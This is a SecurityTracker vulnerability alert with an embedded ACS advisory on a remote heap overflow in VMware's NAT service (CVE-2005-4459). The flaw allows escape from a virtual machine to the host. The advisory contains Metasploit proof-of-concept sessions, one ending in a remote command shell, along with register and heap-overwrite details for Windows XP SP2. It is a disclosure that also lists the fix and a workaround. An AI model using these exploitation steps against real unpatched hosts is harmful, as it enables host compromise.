VMware Flaw in NAT Function Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1015401
|
|
SecurityTracker URL: http://securitytracker.com/id?1015401
|
|
CVE Reference: CVE-2005-4459
(Links to External Site)
|
Date: Dec 22 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Vendor Confirmed: Yes
|
Version(s): 5.5.0 build-18007 and prior builds
|
Description: A vulnerability was reported in VMware. A remote user can execute arbitrary code on the target system.
If the system is using a NAT networking configuration, a remote user can connect to the target system and trigger a heap overflow
to escape out of the virtual machine and execute arbitrary userspace code on the target system.
The vulnerability resides in
'vmnat.exe' (on Windows-based systems) and 'vmnet-natd' (on Linux systems).
VMWare Workstation, VMWare GSX Server, VMWare Ace,
and VMWare Player are affected.
VMWare ESX Server is not affected.
Tim Shelton of ACS reported this vulnerability.
The
vendor was notified on December 1, 2005.
|
Impact: A remote user can execute arbitrary code on the target system.
|
Solution: The vendor has issued fixed versions, available at:
http://www.vmware.com/download
As a workaround, the configuration of the the virtual machine can be changed so that it does not use NAT networking.
|
Vendor URL: www.vmware.com/ (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Windows (NT), Windows (2000), Windows (2003), Windows (XP)
|
Reported By: Security Advisories <Security-Advisories@acs-inc.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 20 Dec 2005 21:46:15 -0600
From: Security Advisories <Security-Advisories@acs-inc.com>
Subject: [VulnWatch] [ACSSEC-2005-11-25-0x1] VMWare Workstation 5.5.0 <= build-18007 G
|
------_=_NextPart_001_01C605E0.FBD1E86E
Content-Type: text/plain
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
ACS Security Assessment Advisory - Remote Heap Overflow
ID: ACSSEC-2005-11-25 - 0x1
Class: Remote Heap Overflow
Package: VMWare Workstation 5.5.0 <= build-18007
VMWare GSX Server Variants
VMWare Ace Variants
VMWare Player Variants
Exempt: VMWare ESX Server Variants
Build: Windows NT/2k/XP/2k3
Notified: Dec 01, 2005
Released: Dec 21, 2005
Remote: Yes
Severity: High
Credit: Tim Shelton <security-advisories@acs-inc.com>
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
-=[ Background
"VMware Workstation is powerful desktop virtualization software for software
developers/testers and enterprise IT professionals that runs multiple
operating systems simultaneously on a single PC. Users can run Windows,
Linux, NetWare, or Solaris x86 in fully networked, portable virtual machines
- no rebooting or hard drive partitioning required. VMware Workstation
delivers excellent performance and advanced features such as memory
optimization and the ability to manage multi-tier configurations and
multiple snapshots.
With millions of customers and dozens of major product awards over the last
six years, VMware Workstation is a proven technology that improves
productivity and flexibility. An indispensable tool for software developers
and IT professionals worldwide."
-- http://www.vmware.com/products/ws/
-=[ Technical Description
A vulnerability was identified in VMware Workstation (And others) vmnat.exe,
which could be exploited by remote attackers to execute arbitrary commands.
This vulnerability allows the escape from a VMware Virtual Machine into
userland space and compromising the host.
'Vmnat' is unable to process specially crafted 'EPRT' and 'PORT' FTP
Requests.
-=[ Proof of Concept:
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
msf > use vmware_vmnat
msf vmware_vmnat(win32_bind) > exploit
[*] Starting Bind Handler.
[*] VMWare vmnat Remote Heap Exploit by Tim Shelton <security@acs-inc.com>
[*] 220 #### FTP Server Ready.
[*] Login as anonymous/login
[*] Sending evil buffer....
[*] No response from FTP server
[*] Exiting Bind Handler.
vmnat.exe: Access violation when writing to [2F5C2F5C] <- Controllable
Registers
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
-=[ Breakdown
Control over registers ECX, EDI, EBX will allow you overwrite an available
Heap Header PLINK and FLINK.
EDX points to your buffer on overwrite.
Overwrite located at ntdll.0x7C926A36 Windows XP/SP2 build 2600
-=[ Functioning Overflow of Concept:
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
msf > use vmware_vmnat_0day
msf vmware_vmnat_0day(win32_bind) > exploit
[*] Starting Bind Handler.
[*] VMWare vmnat Remote Heap Exploit 0day by Tim Shelton
<security@acs-inc.com>
[*] 220 #### FTP Server Ready.
[*] Login as anonymous/login
[*] Sending evil buffer....
[*] Got connection from 192.168.79.130:34941 <-> 192.168.79.2:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\VMware Workstation>
-=[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]=-
-=[ Credits
Vulnerability originally reported and exploited by Tim Shelton
-=[ ChangeLog
2005-11-25 : Original Advisory
2005-12-01 : Notified Vendor
2005-12-20 : Vendor released patch, disclosing full information.
------_=_NextPart_001_01C605E0.FBD1E86E--
|
|
